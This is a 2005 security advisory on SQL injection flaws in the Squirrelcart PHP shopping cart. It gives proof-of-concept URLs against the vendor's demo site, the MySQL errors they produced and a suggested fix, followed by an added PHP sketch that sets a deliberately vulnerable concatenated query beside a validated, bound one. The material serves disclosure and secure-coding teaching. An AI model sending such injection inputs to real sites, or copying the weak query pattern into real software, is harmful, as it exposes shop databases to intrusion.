Dcrab's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/

Severity: Medium
Title: Squirrelcart PHP Shopping Cart SQL Injection
Date: 30/03/2005

Vendor: Squirrelcart
Vendor Website: http://squirrelcart.com
Summary: Squirrelcart PHP Shopping Cart contains SQL injection vulnerabilities.

Proof of Concept Exploits:

http://demo.squirrelcart.com/index.php?crn='SQL_INJECTION&action=show&show_products_mode=cat_click&PHPSESSID=2069dbe1646bdc46e4e78718e76e6d15
SQL injection

MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'SQL_INJECTION' at line 1
Query was: SELECT View_Products_per_View FROM Categories WHERE record_number = \'SQL_INJECTION

http://demo.squirrelcart.com/index.php?crn=0&rn=&action=show_detail&PHPSESSID=2069dbe1646bdc46e4e78718e76e6d15
SQL injection

MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
Query was: SELECT Table_2 FROM REL_Products__Sales_Agreement WHERE Table_1 =
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 4
Query was: SELECT DISTINCT d. * FROM Discounts d LEFT JOIN REL_Products__Discounts pd ON d.record_number = pd.Table_2 WHERE pd.Table_1 =
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
Query was: SELECT Table_2 FROM REL_Products__Categories WHERE Table_1 =
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 4
Query was: SELECT DISTINCT d. * FROM Discounts d LEFT JOIN REL_Products__Discounts pd ON d.record_number = pd.Table_2 WHERE pd.Table_1 =
MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
Query was: SELECT Table_2 FROM REL_Products__Categories WHERE Table_1 =

Possible fix: The usage of htmlspecialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the MySQL database, or before echoing data on the screen, would solve these problems.

Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Look out for my soon to come out book on Secure coding with php.
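
An added example (not Squirrelcart code and not part of the advisory) for the fix suggested above. The error output shows the quote arriving already backslash-escaped and the value sitting unquoted in a numeric comparison, so this sketch validates the id as an integer and binds it as a parameter. It assumes PHP with the pdo_sqlite extension; the in-memory rows and the function names are constructed.

```php
<?php
// Added example, not Squirrelcart source. Table and column names come from the
// error output quoted in the advisory; rows and function names are constructed.

// Constructed in-memory database standing in for the shop's MySQL schema.
function demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE Categories (record_number INTEGER PRIMARY KEY, View_Products_per_View INTEGER)');
    $db->exec('INSERT INTO Categories VALUES (1, 12), (2, 24)');
    return $db;
}

// Weak pattern: the value is escaped (addslashes() stands in for the escaping
// visible in the advisory's error output) but placed unquoted in a numeric
// comparison, so non-numeric or empty input still reaches the SQL parser.
function per_view_concat(PDO $db, string $crn): array {
    $sql = 'SELECT View_Products_per_View FROM Categories WHERE record_number = '
         . addslashes($crn);
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened pattern: accept only a non-negative integer, then bind it as a
// typed parameter instead of building SQL text.
function per_view_bound(PDO $db, ?string $crn): array {
    $id = filter_var($crn, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($id === false) {
        return [];                       // covers null, '' and quoted input
    }
    $stmt = $db->prepare('SELECT View_Products_per_View FROM Categories WHERE record_number = :rn');
    $stmt->bindValue(':rn', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db = demo_db();
// Inputs: a valid id, the advisory's placeholder, and the empty rn= case.
foreach (["1", "'SQL_INJECTION", ""] as $crn) {
    try {
        $weak = json_encode(per_view_concat($db, $crn));
    } catch (PDOException $e) {
        $weak = 'SQL error';             // same failure class the advisory shows
    }
    printf("crn=%-16s concat=%-10s bound=%s\n",
        var_export($crn, true), $weak, json_encode(per_view_bound($db, $crn)));
}
```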